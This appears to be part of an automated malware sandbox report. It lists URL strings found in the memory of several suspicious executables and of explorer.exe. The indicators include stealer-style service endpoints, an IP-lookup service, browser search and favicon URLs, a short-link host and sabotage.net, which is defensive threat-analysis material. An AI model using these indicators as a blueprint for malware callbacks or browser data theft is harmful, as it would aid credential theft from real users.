Source: AppLaunch.exe, 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24
Source: AppLaunch.exe, 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24Response
Source: AppLaunch.exe, 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2Response
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2ResponseD
Source: AppLaunch.exe, 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3
Source: AppLaunch.exe, 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3Response
Source: AppLaunch.exe, 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4
Source: AppLaunch.exe, 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4Response
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4ResponseD
Source: AppLaunch.exe, 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5Response
Source: AppLaunch.exe, 00000009.00000002.2381658030.0000000006737000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5ResponseD
Source: AppLaunch.exe, 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6
Source: AppLaunch.exe, 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6Response
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000677B000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003829000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6ResponseD
Source: AppLaunch.exe, 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7
Source: AppLaunch.exe, 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7Response
Source: AppLaunch.exe, 00000009.00000002.2381658030.00000000066E9000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000009.00000002.2381658030.0000000006959000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7ResponseD
Source: AppLaunch.exe, 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8
Source: AppLaunch.exe, 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8Response
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8ResponseD
Source: AppLaunch.exe, 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9
Source: AppLaunch.exe, 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9Response
Source: AppLaunch.exe, 00000009.00000002.2381658030.0000000006737000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000009.00000002.2381658030.0000000006A2B000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003829000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9ResponseD
Source: 38B4.exe, 00000006.00000003.2148883294.0000000002003000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://2no.co/1oH5RS
Source: 38B4.exe, 00000006.00000003.2166948753.000000000200F000.00000004.00000020.00020000.00000000.sdmp, 38B4.exe, 00000006.00000003.2150578256.000000000200F000.00000004.00000020.00020000.00000000.sdmp, 38B4.exe, 00000006.00000003.2148883294.0000000002003000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://2no.co/1oH5RV
Source: 38B4.exe, 00000006.00000003.2205692406.00000000020C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://2no.co/r
Source: 38B4.exe, 00000006.00000003.2205692406.00000000020AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://2no.co:443/1oH5R
Source: 4A1B.exe, 0000000A.00000002.2409214052.00000000062BD000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2409214052.000000000634A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003AAF000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003C12000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2409214052.00000000063F3000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2409214052.00000000063D7000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003A62000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2409214052.000000000624B000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003CA8000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003BDA000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2409214052.00000000062D8000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003C70000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2409214052.0000000006365000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003AE5000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2409214052.000000000622F000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003B7C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2360680338.0000000002CAE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: explorer.exe, 00000001.00000000.1796028449.000000000C893000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000001.00000000.1790741511.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/Vh5j3k
Source: explorer.exe, 00000001.00000000.1790741511.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/odirmr
Source: explorer.exe, 00000001.00000000.1796028449.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: AppLaunch.exe, 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb/ip
Source: explorer.exe, 00000001.00000000.1793089251.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000001.00000000.1793089251.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/q
Source: explorer.exe, 00000001.00000000.1789659697.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1789050552.0000000001240000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000001.00000000.1793089251.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
Source: explorer.exe, 00000001.00000000.1790741511.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
Source: explorer.exe, 00000001.00000000.1790741511.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1793089251.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000001.00000000.1793089251.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.comi
Source: explorer.exe, 00000001.00000000.1790741511.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
Source: explorer.exe, 00000001.00000000.1790741511.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000001.00000000.1790741511.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
Source: explorer.exe, 00000001.00000000.1790741511.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
Source: 4A1B.exe, 0000000A.00000002.2409214052.00000000062BD000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2409214052.000000000634A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003AAF000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003C12000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2409214052.00000000063F3000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2409214052.00000000063D7000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003A62000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2409214052.000000000624B000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003CA8000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003BDA000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2409214052.00000000062D8000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003C70000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2409214052.0000000006365000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003AE5000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2409214052.000000000622F000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003B7C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2360680338.0000000002CAE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: explorer.exe, 00000001.00000000.1790741511.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000001.00000000.1790741511.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000001.00000000.1790741511.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
Source: explorer.exe, 00000001.00000000.1790741511.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
Source: explorer.exe, 00000001.00000000.1790741511.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
Source: explorer.exe, 00000001.00000000.1790741511.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
Source: explorer.exe, 00000001.00000000.1790741511.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
Source: explorer.exe, 00000001.00000000.1790741511.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
Source: 4A1B.exe, 0000000A.00000002.2409214052.00000000062BD000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2409214052.000000000634A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003AAF000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003C12000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2409214052.00000000063F3000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2409214052.00000000063D7000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003A62000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2409214052.000000000624B000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003CA8000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003BDA000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2409214052.00000000062D8000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003C70000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2409214052.0000000006365000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003AE5000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2409214052.000000000622F000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003B7C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2360680338.0000000002CAE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 4A1B.exe, 0000000A.00000002.2409214052.00000000062BD000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2409214052.000000000634A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003AAF000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003C12000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2409214052.00000000063F3000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2409214052.00000000063D7000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003A62000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2409214052.000000000624B000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003CA8000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003BDA000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2409214052.00000000062D8000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003C70000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2409214052.0000000006365000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003AE5000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2409214052.000000000622F000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003B7C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2360680338.0000000002CAE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 4A1B.exe, 0000000A.00000002.2409214052.00000000062BD000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2409214052.000000000634A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003AAF000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003C12000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2409214052.00000000063F3000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2409214052.00000000063D7000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003A62000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2409214052.000000000624B000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003CA8000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003BDA000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2409214052.00000000062D8000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003C70000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2409214052.0000000006365000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003AE5000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2409214052.000000000622F000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003B7C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2360680338.0000000002CAE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 4A1B.exe, 0000000A.00000002.2391907349.0000000003C12000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2409214052.00000000063F3000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003A62000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2409214052.000000000624B000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003CA8000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2409214052.00000000062D8000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2409214052.0000000006365000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003AE5000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003B7C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2360680338.0000000002CAE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 4A1B.exe, 0000000A.00000002.2409214052.00000000062BD000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2409214052.000000000634A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003AAF000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2409214052.00000000063D7000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003BDA000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003C70000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2409214052.000000000622F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabS
Source: 4A1B.exe, 0000000A.00000002.2409214052.00000000062BD000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2409214052.000000000634A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003AAF000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003C12000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2409214052.00000000063F3000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2409214052.00000000063D7000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003A62000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2409214052.000000000624B000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003CA8000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003BDA000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2409214052.00000000062D8000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003C70000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2409214052.0000000006365000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003AE5000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2409214052.000000000622F000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003B7C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2360680338.0000000002CAE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: explorer.exe, 00000001.00000000.1796028449.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000001.00000000.1790741511.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000001.00000000.1790741511.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
Source: explorer.exe, 00000001.00000000.1790741511.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
Source: explorer.exe, 00000001.00000000.1790741511.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
Source: explorer.exe, 00000001.00000000.1790741511.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
Source: explorer.exe, 00000001.00000000.1790741511.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
Source: explorer.exe, 00000001.00000000.1790741511.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
Source: explorer.exe, 00000001.00000000.1796028449.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com_
Source: explorer.exe, 00000001.00000000.1796028449.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comcember
Source: 50E3.exe, 00000010.00000003.2392623852.0000000003B14000.00000004.00000020.00020000.00000000.sdmp, 50E3.exe, 00000010.00000003.2392437435.00000000039B9000.00000004.00000020.00020000.00000000.sdmp, 50E3.exe, 00000010.00000003.2395267241.0000000003DB0000.00000004.00000020.00020000.00000000.sdmp, 50E3.exe, 00000010.00000003.2403783908.0000000003114000.00000004.00000020.00020000.00000000.sdmp, 50E3.exe, 00000010.00000003.2402890575.00000000030F4000.00000004.00000020.00020000.00000000.sdmp, 50E3.exe, 00000010.00000003.2402000819.00000000030C0000.00000004.00000020.00020000.00000000.sdmp, 50E3.exe, 00000010.00000003.2402375239.00000000030F4000.00000004.00000020.00020000.00000000.sdmp, 50E3.exe, 00000010.00000003.2401222199.00000000030B9000.00000004.00000020.00020000.00000000.sdmp, 50E3.exe, 00000010.00000003.2402285959.00000000030E5000.00000004.00000020.00020000.00000000.sdmp, 50E3.exe, 00000010.00000003.2400905852.0000000003092000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sabotage.net
Source: explorer.exe, 00000001.00000000.1790741511.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
